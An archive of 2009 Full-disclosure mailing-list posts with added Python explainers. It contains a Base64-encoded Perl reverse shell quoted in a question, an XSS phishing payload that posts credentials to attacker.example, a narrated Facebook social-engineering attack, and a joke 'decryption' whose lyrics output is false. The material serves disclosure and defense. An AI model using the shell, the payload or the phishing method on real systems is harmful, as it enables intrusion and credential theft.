(1) the final quantum of encoding input is an integral multiple of 24 bits; here, the final unit of encoded output will be an integral multiple of 4 characters with no "=" padding,

(2) the final quantum of encoding input is exactly 8 bits; here, the final unit of encoded output will be two characters followed by two "=" padding characters, or

(3) the final quantum of encoding input is exactly 16 bits; here, the final unit of encoded output will be three characters followed by one "=" padding character.

2. Illustrations and examples

To translate between binary and this encryption schema, the input is stored in a structure and the output is extracted. This relationship is displayed in the following figure.

      +--first octet--+-second octet--+--third octet--+
      |7 6 5 4 3 2 1 0|7 6 5 4 3 2 1 0|7 6 5 4 3 2 1 0|
      +-----------+---+-------+-------+---+-----------+
      |5 4 3 2 1 0|5 4 3 2 1 0|5 4 3 2 1 0|5 4 3 2 1 0|
      +--1.index--+--2.index--+--3.index--+--4.index--+

The following is an example of this schema in use.

Input data:  0x14fb9c03d97e
Hex:     1   4    f   b    9   c     | 0   3    d   9    7   e
8-bit:   00010100 11111011 10011100  | 00000011 11011001 01111110
6-bit:   000101 001111 101110 011100 | 000000 111101 100101 111110
Decimal: 5      15     46     28       0      61     37     62
Output:  F      P      u      c        A      9      l      +

Input data:  0x14fb9c03d9
Hex:     1   4    f   b    9   c     | 0   3    d   9
8-bit:   00010100 11111011 10011100  | 00000011 11011001    pad with 00
6-bit:   000101 001111 101110 011100 | 000000 111101 100100
Decimal: 5      15     46     28       0      61     36
                                                          pad with =
Output:  F      P      u      c        A      9      k      =

Input data:  0x14fb9c03
Hex:     1   4    f   b    9   c     | 0   3
8-bit:   00010100 11111011 10011100  | 00000011    pad with 0000
6-bit:   000101 001111 101110 011100 | 000000 110000
Decimal: 5      15     46     28       0      48
                                                   pad with =      =
Output:  F      P      u      c        A      w      =      =

3. Conclusions

Given this analysis of the provided data it is clear that when decrypted the clear text of the encrypted string:

"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"

Becomes:

"I've had a little bit too much, much
All of the people start to rush, start to rush by
A dizzy twisted dance, can't find my drink, oh man
Where are my keys? I lost my phone, phone
What's going on on the floor?
I love this record baby but I can't see straight anymore
Keep it cool, what's the name of this club?
I can't remember but it's alright, a-alright
Just dance, gonna be okay, da da doo-doo-mmm
Just dance, spin that record babe, da da doo-doo-mmm
Just dance, gonna be okay, d-d-d-dance
Dance, dance, just, j-j-just dance
Wish I could shut my playboy mouth, oh oh oh-oh
How'd I turn my shirt inside out? Inside outright
Control your poison babe, roses have thorns they say
And we're all getting hosed tonight, oh oh oh-oh
What's going on on the floor?
I love this record baby but I can't see straight anymore
Keep it cool, what's the name of this club?
I can't remember but it's alright, a-alright
Just dance, gonna be okay, da da doo-doo-mmm
Just dance, spin that record babe, da da doo-doo-mmm
Just dance, gonna be okay, d-d-d-dance
Dance, dance, just, j-j-just
When I come through on the dance floor checkin' out that catalog
Can't believe my eyes, so many women without a flaw
And I ain't gon' give it up, steady tryin' to pick it up like a car
I'ma hit it, I'ma hit it and flex and do it until tomorr' yeah
Shawty I can see that you got so much energy
The way you're twirlin' up them hips 'round and 'round
And now there's no reason at all why you can't leave here with me
In the meantime stay and let me watch you break it down
And dance, gonna be okay, da da doo-doo-mmm
Just dance, spin that record babe, da da doo-doo-mmm
Just dance, gonna be okay, da da doo-doo-mmm
Just dance, spin that record babe, da da doo-doo-mmm
Just dance, gonna be okay, d-d-d-dance
Dance, dance, just, j-j-just dance
Woo! Let's go!
Half psychotic, sick, hypnotic
Got my blueprint, it's symphonic
Half psychotic, sick, hypnotic
Got my blueprint electronic
Half psychotic, sick, hypnotic
Got my blueprint, it's symphonic
Half psychotic, sick, hypnotic
Got my blueprint electronic
Go! Use your muscle, carve it out, work it, hustle
I got it, just stay close enough to get it
Don't slow! Drive it, clean it, Lysol, bleed it
Spend the last dough (I got it)
In your pocko (I got it)
Just dance, gonna be okay, da da doo-doo-mmm
Just dance, spin that record babe, da da doo-doo-mmm
Just dance, gonna be okay, da da doo-doo-mmm
Just dance, spin that record babe, da da doo-doo-mmm
Just dance, gonna be okay, d-d-d-dance
Dance, dance, just, j-j-just dance"

(c)opyright Fredrick Diggle Security 2009

On Tue, Feb 10, 2009 at 12:23 PM, sr. wrote:
> can anyone tell me what encoding this is?
>
> $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
> aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
> hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
> sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
> kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
> KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
> OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
>
> this has to do with old php 4.x.x version with magic quotes enabled.
> i'm just trying to figure out what the connect back code does.
>
> any input is much appreciated.
>
> thx,
>
> sr.
>

From thijs at debian.org Wed Feb 11 21:44:16 2009
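The "encryption schema" walked through in the analysis above is plain Base64 (the text is the RFC 4648 description of it). The following Python is an added example, not code from any poster on this thread: it implements the encoder from that description, a strict decoder that rejects non-canonical input, and a small recogniser of the kind used when triaging suspicious string literals such as the `$back_connect` value in the original question. The three vectors are the worked examples from the analysis; the function names, the `looks_like_base64` heuristic and its `min_len` threshold are this example's own assumptions.

```python
"""Base64 (RFC 4648) encoder, strict decoder and literal recogniser.

Added example for this archive page; not code from any poster on the
thread.  The three vectors in VECTORS are the ones worked through in the
analysis above.  Function names and the looks_like_base64() heuristic
are this example's own.
"""
import re

# Table 1 from the analysis: index 0..63 -> printable character.
ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
PAD = "="
DECODE_MAP = {c: i for i, c in enumerate(ALPHABET)}


def b64_encode(data: bytes) -> str:
    """Encode 3 octets at a time into 4 sixtets; pad a short tail with '='."""
    out = []
    for i in range(0, len(data), 3):
        chunk = data[i:i + 3]
        n = len(chunk)
        # 24-bit group; a short final group is zero-filled on the right.
        bits = int.from_bytes(chunk.ljust(3, b"\x00"), "big")
        sixtets = [(bits >> shift) & 0x3F for shift in (18, 12, 6, 0)]
        # n input octets yield n+1 real output characters (cases 1-3 above).
        keep = n + 1
        out.append("".join(ALPHABET[s] for s in sixtets[:keep]) + PAD * (4 - keep))
    return "".join(out)


def b64_decode(text: str) -> bytes:
    """Strict decoder: rejects bad length, foreign characters, misplaced
    padding and non-zero padding bits (i.e. a non-canonical encoding)."""
    if len(text) % 4:
        raise ValueError("length is not a multiple of 4")
    pad = len(text) - len(text.rstrip(PAD))
    body = text[:len(text) - pad]
    if pad > 2 or PAD in body:
        raise ValueError("invalid padding")
    out = bytearray()
    for i in range(0, len(body), 4):
        quad = body[i:i + 4]
        try:
            vals = [DECODE_MAP[c] for c in quad]
        except KeyError as exc:
            raise ValueError(f"character {exc} not in alphabet") from None
        vals += [0] * (4 - len(vals))
        group = ((vals[0] << 18) | (vals[1] << 12) | (vals[2] << 6) | vals[3]).to_bytes(3, "big")
        keep = len(quad) - 1  # 4 chars -> 3 octets, 3 -> 2, 2 -> 1
        if any(group[keep:]):
            raise ValueError("non-zero padding bits")
        out += group[:keep]
    return bytes(out)


# Shape check for triaging string literals: right alphabet, '=' only at the end.
_B64_SHAPE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def looks_like_base64(literal: str, min_len: int = 16) -> bool:
    """True if a (possibly line-wrapped) literal is canonical Base64 of a
    useful length.  min_len is this example's own threshold."""
    s = "".join(literal.split())  # the posted literal was wrapped across lines
    if len(s) < min_len or not _B64_SHAPE.match(s):
        return False
    try:
        b64_decode(s)
    except ValueError:
        return False
    return True


# Constructed test vectors: the three worked examples from the analysis above.
VECTORS = {
    bytes.fromhex("14fb9c03d97e"): "FPucA9l+",
    bytes.fromhex("14fb9c03d9"): "FPucA9k=",
    bytes.fromhex("14fb9c03"): "FPucAw==",
}


def check_vectors() -> bool:
    """Round-trip every vector through both directions."""
    return all(b64_encode(raw) == enc and b64_decode(enc) == raw
               for raw, enc in VECTORS.items())


if __name__ == "__main__":
    print("vectors ok:", check_vectors())
```

The decoder is deliberately strict: lenient decoders that skip foreign characters or ignore non-zero padding bits will accept many strings that are not canonical Base64, which is exactly the slack that obfuscated literals tend to rely on, so a literal that only a lenient decoder accepts deserves a closer look rather than a pass.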
From: thijs at debian.org (Thijs Kinkhorst)
Date: Wed, 11 Feb 2009 22:44:16 +0100 (CET)
Subject: [Full-disclosure] [SECURITY] [DSA 1723-1] New phpmyadmin packages fix arbitrary code execution
Message-ID: <20090211214416.210D93267E0@morgana.loeki.tv>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1723-1                  security at debian.org
http://www.debian.org/security/                           Thijs Kinkhorst
February 11, 2009                     http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : phpmyadmin
Vulnerability  : insufficient input sanitising
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2008-5621

Michael Brooks discovered that phpMyAdmin, a tool to administrate MySQL
over the web, performs insufficient input sanitising, allowing a
user-assisted remote attacker to execute code on the webserver.

For the stable distribution (etch), this problem has been fixed in
version 2.9.1.1-10.

For the testing distribution (lenny) and unstable distribution (sid),
this problem has been fixed in version 2.11.8.1-5.

We recommend that you upgrade your phpmyadmin package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 4.0 alias etch
- -------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/p/phpmyadmin/phpmyadmin_2.9.1.1-10.dsc
    Size/MD5 checksum:     1021 9428b84187a0fc1c893e099987f746f6
  http://security.debian.org/pool/updates/main/p/phpmyadmin/phpmyadmin_2.9.1.1.orig.tar.gz
    Size/MD5 checksum:  3500563 f598509b308bf96aee836eb2338f523c
  http://security.debian.org/pool/updates/main/p/phpmyadmin/phpmyadmin_2.9.1.1-10.diff.gz
    Size/MD5 checksum:    54951 8441cbf454016d4425dddaef569bbd21

Architecture independent packages:

  http://security.debian.org/pool/updates/main/p/phpmyadmin/phpmyadmin_2.9.1.1-10_all.deb
    Size/MD5 checksum:  3603132 538d80062d8fc4c009e0e0e01ffbacd4


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iQEcBAEBAgAGBQJJk0XOAAoJECIIoQCMVaAcpM0H/Au7C8amq2N1MsPR+EaF1sPS
NeYjY1pEEmnJ7Pr9u4oizb5M3V9hYqWfsr6cU+pRnwvTLP2/aYJKdUltOymFvV2T
TUnvGtuHDWLswSviiaZikqRrRKGqZJfDsqTwjKU8JeuDgBU173OKawv8n+408y6X
cQlgzjLiOVIyqC41aoZx9ToraBoqtI8hQQoIgV/akH/jYNa0B7Lcb456+WozJXdr
ZbtJFjn22vMoT8CHp/60ysCZhy1s0hV/SNXLUlxvsjG8IKmiLcYnPz8bDe5Hnzme
KXH3QjMDbtBwikWkdf2B8Z0hdpJNRpLiHQ9PG6NPPZm55/hCtoRNFtbeStVqo8M=
=tnTX
-----END PGP SIGNATURE-----

From juha-matti.laurio at netti.fi Thu Feb 12 13:43:14 2009
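The upgrade instructions in DSA-1722 and DSA-1723 above publish a Size/MD5 line for every file but leave the check itself to the reader. The Python below is an added example, not Debian's own tooling: it parses the URL / "Size/MD5 checksum:" pairs in the advisory format shown above and verifies a downloaded file's size and digest against them. The advisory snippet is copied from DSA-1723; the sample data used in the checks are the RFC 1321 MD5 test vectors; the function and class names are this example's own. The caveat a practitioner should keep in mind: the MD5 only authenticates the file if the value you compare against comes from the PGP-signed advisory text after its signature has been verified, which is why these advisories are clearsigned.

```python
"""Check a downloaded Debian package against the Size/MD5 lines of a DSA.

Added example for this archive page, not Debian's own tooling.  It reads the
"URL" / "Size/MD5 checksum: <size> <md5>" pairs in the format DSA-1722 and
DSA-1723 above use, then compares a local file's size and digest.  The
advisory snippet is copied from DSA-1723.  Function and class names are this
example's own.
"""
import hashlib
import hmac
import os
import re
import sys
from dataclasses import dataclass
from typing import Dict, Optional

# Copied from the DSA-1723 file list above; one entry is enough to show the format.
ADVISORY_SNIPPET = """
Architecture independent packages:

  http://security.debian.org/pool/updates/main/p/phpmyadmin/phpmyadmin_2.9.1.1-10_all.deb
    Size/MD5 checksum:  3603132 538d80062d8fc4c009e0e0e01ffbacd4
"""

_CHECKSUM = re.compile(r"Size/MD5 checksum:\s+(\d+)\s+([0-9a-fA-F]{32})")


@dataclass(frozen=True)
class Expected:
    url: str
    size: int
    md5: str


def parse_advisory(text: str) -> Dict[str, Expected]:
    """Map file basename -> Expected for each URL followed by a checksum line."""
    entries: Dict[str, Expected] = {}
    pending: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith(("http://", "https://", "ftp://")):
            pending = line  # a file URL; its Size/MD5 line should follow
            continue
        m = _CHECKSUM.search(line)
        if m and pending:
            name = pending.rsplit("/", 1)[-1]
            entries[name] = Expected(pending, int(m.group(1)), m.group(2).lower())
            pending = None
    return entries


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def verify_bytes(data: bytes, expected: Expected) -> bool:
    """Cheap size check first, then a constant-time digest comparison."""
    if len(data) != expected.size:
        return False
    return hmac.compare_digest(md5_hex(data), expected.md5)


def verify_file(path: str, entries: Dict[str, Expected]) -> bool:
    """Verify one downloaded file; KeyError if the advisory does not list it."""
    name = os.path.basename(path)
    with open(path, "rb") as fh:
        return verify_bytes(fh.read(), entries[name])


if __name__ == "__main__":
    # usage: python3 verify_dsa.py advisory.txt package.deb [more.deb ...]
    # advisory.txt must be the PGP-signed mail, with its signature already verified.
    with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
        listed = parse_advisory(fh.read())
    for deb in sys.argv[2:]:
        print(("OK" if verify_file(deb, listed) else "MISMATCH") + "\t" + deb)
```

Comparing the size before the digest is cheap and catches truncated downloads immediately; the constant-time compare is a habit rather than a necessity here, since the digest is public, but it costs nothing.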
From: juha-matti.laurio at netti.fi (Juha-Matti Laurio)
Date: Thu, 12 Feb 2009 15:43:14 +0200 (EET)
Subject: [Full-disclosure] metasploit.com = 127.0.0.1
Message-ID: <26358240.1141171234446195623.JavaMail.juha-matti.laurio@netti.fi>

And Metasploit Blog confirms the DDoS too:
http://blog.metasploit.com/2009/02/pathetic-ddos-vs-security-sites.html

Juha-Matti

From ad_lists at netragard.com Thu Feb 12 16:23:48 2009
From: ad_lists at netragard.com (Adriel T. Desautels)
Date: Thu, 12 Feb 2009 11:23:48 -0500
Subject: [Full-disclosure] Facebook from a hackers perspective
Message-ID: <0625647E-1921-43C8-B0A1-E946FD3FBF91@netragard.com>

For those interested, here is our latest blog entry.

For the past few years we (Netragard) have been using internet-based social networking tools to hack into our customers' IT infrastructures. This method of attack has been used by hackers since the conception of social networking websites, but only recently has it caught the attention of the media. As a result of this new exposure we've decided to give people a rare glimpse into Facebook from a hacker's perspective.

Let's start off by talking about the internet and identity. The internet is a shapeless world where identities are not only dynamic but can't ever be verified with certainty. As a result, it's easily possible to be one person one moment, then another person the next moment. This is particularly true when using internet-based social networking sites like Facebook (and the rest).

Humans have a natural tendency to trust each other. If one human being can provide another human with "something sufficient" then trust is earned. That "something sufficient" can be a face-to-face meeting, but it doesn't always need to be. Roughly 90% of the people that we've targeted and successfully exploited during our social attacks trusted us because they thought we worked for the same company as them.

The setup...

Facebook allows its users to search for other users by keyword. Many Facebook users include their place of employment in their profile. Some companies even have Facebook groups that only employees or contractors are allowed to become members of. So step one is to perform reconnaissance against those Facebook-using employees. This can be done with Facebook, or with reconnaissance tools like Maltego and pipl.com.

Reconnaissance is the military term for the collection of intelligence about an enemy prior to attacking the enemy. With regards to hacking, reconnaissance can be performed against social targets (Facebook, MySpace, etc.) and technology targets (servers, firewalls, routers, etc.). Because our preferred method of attacking employees through Facebook is via phishing, we normally perform reconnaissance against both vectors.

When setting up for the ideal attack, two things are nice to have but only one is required. The first is the discovery of some sort of Cross-site Scripting vulnerability (or something else useful) in our customer's website (or one of their servers). The vulnerability is the component that is not required, but is nice to have (we can set up our own fake server if we need to). The second component is the required component, and that is the discovery of Facebook profiles for employees that work for our customer (other social networking sites work just as well).

In one of our recent engagements we performed detailed social and technical reconnaissance. The social reconnaissance enabled us to identify 1402 employees, 906 of which used Facebook. We didn't read all 906 profiles, but we did read around 200, which gave us sufficient information to create a fake employee profile. The technical reconnaissance identified various vulnerabilities, one of which was the Cross-site Scripting vulnerability that we usually hope to find. In this case the vulnerability existed in our customer's corporate website.

Cross-site Scripting ("XSS") is a kind of computer security vulnerability that is most frequently discovered in websites that do not have sufficient input validation or data validation capabilities. XSS vulnerabilities allow an attacker to inject code into a website that is viewed by other users. This injection can be done server side by saving the injected code on the server (in a forum, blog, etc.) or it can be done client side by injecting the code into a specially crafted URL that can be delivered to a victim. During our recent engagement we used a client side attack as opposed to a server side attack. We chose the client side attack because it enabled us to select only the users that we were interested in attacking. Server side attacks are not as surgical and usually affect any user who views the compromised server page.

The payload that we created was designed to render a legitimate-looking https-secured web page that appeared to be a component of our customer's web site. When a victim clicks on the specially crafted link, the payload is executed and the fake web page is rendered. In this case our fake web page was an alert that warned users that their accounts may have been compromised and that they should verify their credentials by entering them into the form provided. When a user's credentials were entered, the form submitted them to http://www.netragard.com, where they were extracted by an automated tool that we created.

After the payload was created and tested, we started the process of building an easy-to-trust Facebook profile. Because most of the targeted employees were male between the ages of 20 and 40, we decided that it would be best to become a very attractive 28-year-old female. We found a fitting photograph by searching Google Images and used that photograph for our fake Facebook profile. We also populated the profile with information about our experiences at work by using combined stories that we collected from real employee Facebook profiles. Upon completion we joined our customer's Facebook group. Joining wasn't an issue and our request was approved in a matter of hours. Within twenty minutes of being accepted as group members, legitimate customer employees began requesting our friendship.

In addition to inbound requests we made hundreds of outbound requests. Our friends list grew very quickly and included managers, executives, secretaries, interns, and even contractors. After having collected a few hundred friends, we began chatting. Our conversations were based on work-related issues that we were able to collect from legitimate employee profiles. After a period of three days of conversing and sharing links, we posted our specially crafted link to our Facebook profile. The title of the link was "Omitted have you seen this I think we got hacked!"

Sure enough, people started clicking on the link and verifying their credentials. Ironically, the first set of credentials that we got belonged to the person that hired us in the first place. We used those credentials to access the web VPN, which in turn gave us access to the network. As it turns out, those credentials also allowed us to access the majority of systems on the network, including the Active Directory server, the mainframe, pump control systems, the Checkpoint firewall console, etc. It was game over; the Facebook hack worked yet again.

During testing we did evaluate the customer's entire infrastructure, but the results of the evaluation have been left out of this post for clarity. We also provided our customer with a solution that was unique to them to counter the social network threat. They've since implemented the solution and have reported on 4 other social penetration attempts since early 2008.

The threat that social networks bring to the table affects every business, and the described method of attack has an extraordinarily high success rate.

Please leave your comments on the blog.

Adriel T. Desautels
ad_lists at netragard.com
--------------------------------------
Subscribe to our blog
http://snosoft.blogspot.com

From security at mandriva.com Thu Feb 12 17:57:01 2009
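The client-side (reflected) XSS pattern and the credential-phishing payload described in the post above, as an added example that is not part of the post and not Netragard's code: a hypothetical search page that reflects its `q` parameter, the same page with output encoding, a constructed payload that renders a fake "verify your credentials" form posting to the made-up host `attacker.example`, and a detector that flags such crafted links in constructed Apache-style access-log lines.

```python
"""Reflected XSS as used for a credential-phishing page, beside the hardened
form, plus a detector for crafted links in web-server access logs.
Added example: the search handler, attacker host and log lines are constructed."""
import html
import re
from urllib.parse import parse_qs, quote, unquote, urlsplit


# --- 1. The vulnerable reflection and its fix -------------------------------

def render_search_vulnerable(query: str) -> str:
    """Copies the untrusted ?q= value straight into the HTML body."""
    return f"<html><body><h1>Results for {query}</h1></body></html>"


def render_search_hardened(query: str) -> str:
    """Same page, but the value is escaped for the HTML element-content
    context it lands in; quote=True also neutralises " and ' for attributes."""
    return f"<html><body><h1>Results for {html.escape(query, quote=True)}</h1></body></html>"


def render_from_url(url: str, renderer) -> str:
    """Simulates the server handling a GET: pull q out of the query string."""
    q = parse_qs(urlsplit(url).query).get("q", [""])[0]
    return renderer(q)


# Constructed payload in the spirit of the post: a fake "verify your account"
# form that posts to the attacker's host, plus a script tag to dress it up.
PAYLOAD = (
    '<div id="alert">Your account may have been compromised. '
    'Please verify your credentials.</div>'
    '<form action="https://attacker.example/collect" method="post">'
    'User <input name="u"> Pass <input name="p" type="password">'
    '<input type="submit" value="Verify"></form>'
    '<script>document.getElementById("alert").style.color="red"</script>'
)
CRAFTED_URL = "https://www.example.com/search?q=" + quote(PAYLOAD, safe="")


def page_contains_injected_markup(page: str) -> bool:
    """Crude oracle: is there a live <script> tag or a form pointing at the
    attacker host in the response? True means a browser would render/run it."""
    return "<script>" in page or 'action="https://attacker.example' in page


# --- 2. Detection over access-log lines -------------------------------------

LOG_RE = re.compile(
    r'^\S+ \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# An HTML tag, an on*= event handler or a javascript: URL inside a decoded parameter
XSS_RE = re.compile(r"<\s*[a-z/!]|on[a-z]+\s*=|javascript\s*:", re.IGNORECASE)


def fully_unquote(s: str, rounds: int = 3) -> str:
    """Decode repeatedly so a double-encoded '<' (%253C) is still caught."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def find_reflected_xss_attempts(log_lines):
    """Return (line_number, parameter, decoded_value) for suspicious requests."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for param, values in parse_qs(query, keep_blank_values=True).items():
            for v in values:
                decoded = fully_unquote(v)
                if XSS_RE.search(decoded):
                    hits.append((n, param, decoded))
    return hits


# Constructed log lines (Apache combined format): benign, the crafted link
# arriving via a social-network referer, and a double-encoded probe.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Feb/2009:11:23:48 -0500] "GET /search?q=quarterly+report HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Feb/2009:11:24:02 -0500] "GET /search?q=' + quote(PAYLOAD, safe="") + ' HTTP/1.1" 200 6410 "https://www.facebook.com/" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Feb/2009:11:24:30 -0500] "GET /search?q=%253Cscript%253Ealert(1)%253C/script%253E HTTP/1.1" 200 5200 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(page_contains_injected_markup(render_from_url(CRAFTED_URL, render_search_vulnerable)))
    print(page_contains_injected_markup(render_from_url(CRAFTED_URL, render_search_hardened)))
    for n, param, value in find_reflected_xss_attempts(SAMPLE_LOG):
        print(n, param, value[:60])
```

`html.escape` is the right encoder only for HTML element content and quoted attribute values; a value reflected into a JavaScript string, a URL or a CSS block needs that context's encoder instead, and the log regex is a tripwire that will also fire on legitimate parameters containing markup, so treat its hits as leads rather than verdicts.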
From: security at mandriva.com (security at mandriva.com)
Date: Thu, 12 Feb 2009 18:57:01 +0100
Subject: [Full-disclosure] [ MDVSA-2009:036 ] python
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2009:036
http://www.mandriva.com/security/
_______________________________________________________________________

Package : python
Date    : February 12, 2009
Affected: Corporate 3.0, Multi Network Firewall 2.0
_______________________________________________________________________

Problem Description:

Multiple integer overflows in imageop.c in the imageop module in Python
1.5.2 through 2.5.1 allow context-dependent attackers to break out of
the Python VM and execute arbitrary code via large integer values in
certain arguments to the crop function, leading to a buffer overflow, a
different vulnerability than CVE-2007-4965 and CVE-2008-1679.
(CVE-2008-4864)

Multiple integer overflows in Python 2.5.2 and earlier allow
context-dependent attackers to have an unknown impact via vectors
related to the (1) stringobject, (2) unicodeobject, (3) bufferobject,
(4) longobject, (5) tupleobject, (6) stropmodule, (7) gcmodule, and (8)
mmapmodule modules. NOTE: The expandtabs integer overflows in
stringobject and unicodeobject in 2.5.2 are covered by CVE-2008-5031.

Multiple integer overflows in Python 2.2.3 through 2.5.1, and 2.6,
allow context-dependent attackers to have an unknown impact via a large
integer value in the tabsize argument to the expandtabs method, as
implemented by (1) the string_expandtabs function in
Objects/stringobject.c and (2) the unicode_expandtabs function in
Objects/unicodeobject.c. NOTE: this vulnerability reportedly exists
because of an incomplete fix for CVE-2008-2315. (CVE-2008-5031)

The updated Python packages have been patched to correct these issues.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2315
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4864
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5031
_______________________________________________________________________

Updated Packages:

Corporate 3.0:
c9668bc25f1306f610bfdfc94b4b944c  corporate/3.0/i586/libpython2.3-2.3.7-0.2.C30mdk.i586.rpm
f2720b0908488c72a4591c89a5d6be6e  corporate/3.0/i586/libpython2.3-devel-2.3.7-0.2.C30mdk.i586.rpm
261fbcfe8cd18a217845051c7c2fdd75  corporate/3.0/i586/python-2.3.7-0.2.C30mdk.i586.rpm
1df9dfe4bacd9982da477f84daf4179e  corporate/3.0/i586/python-base-2.3.7-0.2.C30mdk.i586.rpm
c848a40db3729c5d730409cc8b53ede2  corporate/3.0/i586/python-docs-2.3.7-0.2.C30mdk.i586.rpm
a6844df32103497417ed829693fb60f5  corporate/3.0/i586/tkinter-2.3.7-0.2.C30mdk.i586.rpm
c5f2ad7e5986ab7232658b40e8dea295  corporate/3.0/SRPMS/python-2.3.7-0.2.C30mdk.src.rpm

Corporate 3.0/X86_64:
0969a75152e437953cae2c309697536c  corporate/3.0/x86_64/lib64python2.3-2.3.7-0.2.C30mdk.x86_64.rpm
e297c080c4ab2cd7c5f536a5cda758b2  corporate/3.0/x86_64/lib64python2.3-devel-2.3.7-0.2.C30mdk.x86_64.rpm
d6ddee2f8c6bbe82acb7d5fdaaa75913  corporate/3.0/x86_64/python-2.3.7-0.2.C30mdk.x86_64.rpm
1556e502527f22fad6771d95b288b9cc  corporate/3.0/x86_64/python-base-2.3.7-0.2.C30mdk.x86_64.rpm
acdefbc7a2ed2dd31b6569002e4253e3  corporate/3.0/x86_64/python-docs-2.3.7-0.2.C30mdk.x86_64.rpm
49fd4e84a697d91c64ac5d91b63bf43c  corporate/3.0/x86_64/tkinter-2.3.7-0.2.C30mdk.x86_64.rpm
c5f2ad7e5986ab7232658b40e8dea295  corporate/3.0/SRPMS/python-2.3.7-0.2.C30mdk.src.rpm

Multi Network Firewall 2.0:
cabb486b4f3c24c9fea9920db0576137  mnf/2.0/i586/libpython2.3-2.3.7-0.2.M20mdk.i586.rpm
60b4f62da866083a1c37ad42d532171b  mnf/2.0/i586/libpython2.3-devel-2.3.7-0.2.M20mdk.i586.rpm
b5a2dc2a80a304b2095549b1d0c7c4c8  mnf/2.0/i586/python-2.3.7-0.2.M20mdk.i586.rpm
5964fa32ade61fc6d217481252e75d92  mnf/2.0/i586/python-base-2.3.7-0.2.M20mdk.i586.rpm
f8eb4c23e80dc5ee7cf4abdacc0d01cc  mnf/2.0/i586/python-docs-2.3.7-0.2.M20mdk.i586.rpm
8ca87fc328dd2d3c4f21edc5f244e1cc  mnf/2.0/i586/tkinter-2.3.7-0.2.M20mdk.i586.rpm
6bdfd7584a2e4094ce39424311368ce8  mnf/2.0/SRPMS/python-2.3.7-0.2.M20mdk.src.rpm
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:

 gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

 security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID    Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJlDhYmqjQ0CJFipgRAjxAAJ9Ki28TLWrWrI/6ftj5bLVtNe4MsgCgoH19
A65A1tocyMcWLZBUV61a0KU=
=UwnZ
-----END PGP SIGNATURE-----

From marc.deslauriers at canonical.com Thu Feb 12 19:18:14 2009
From: marc.deslauriers at canonical.com (Marc Deslauriers)
Date: Thu, 12 Feb 2009 14:18:14 -0500
Subject: [Full-disclosure] [USN-719-1] pam-krb5 vulnerabilities
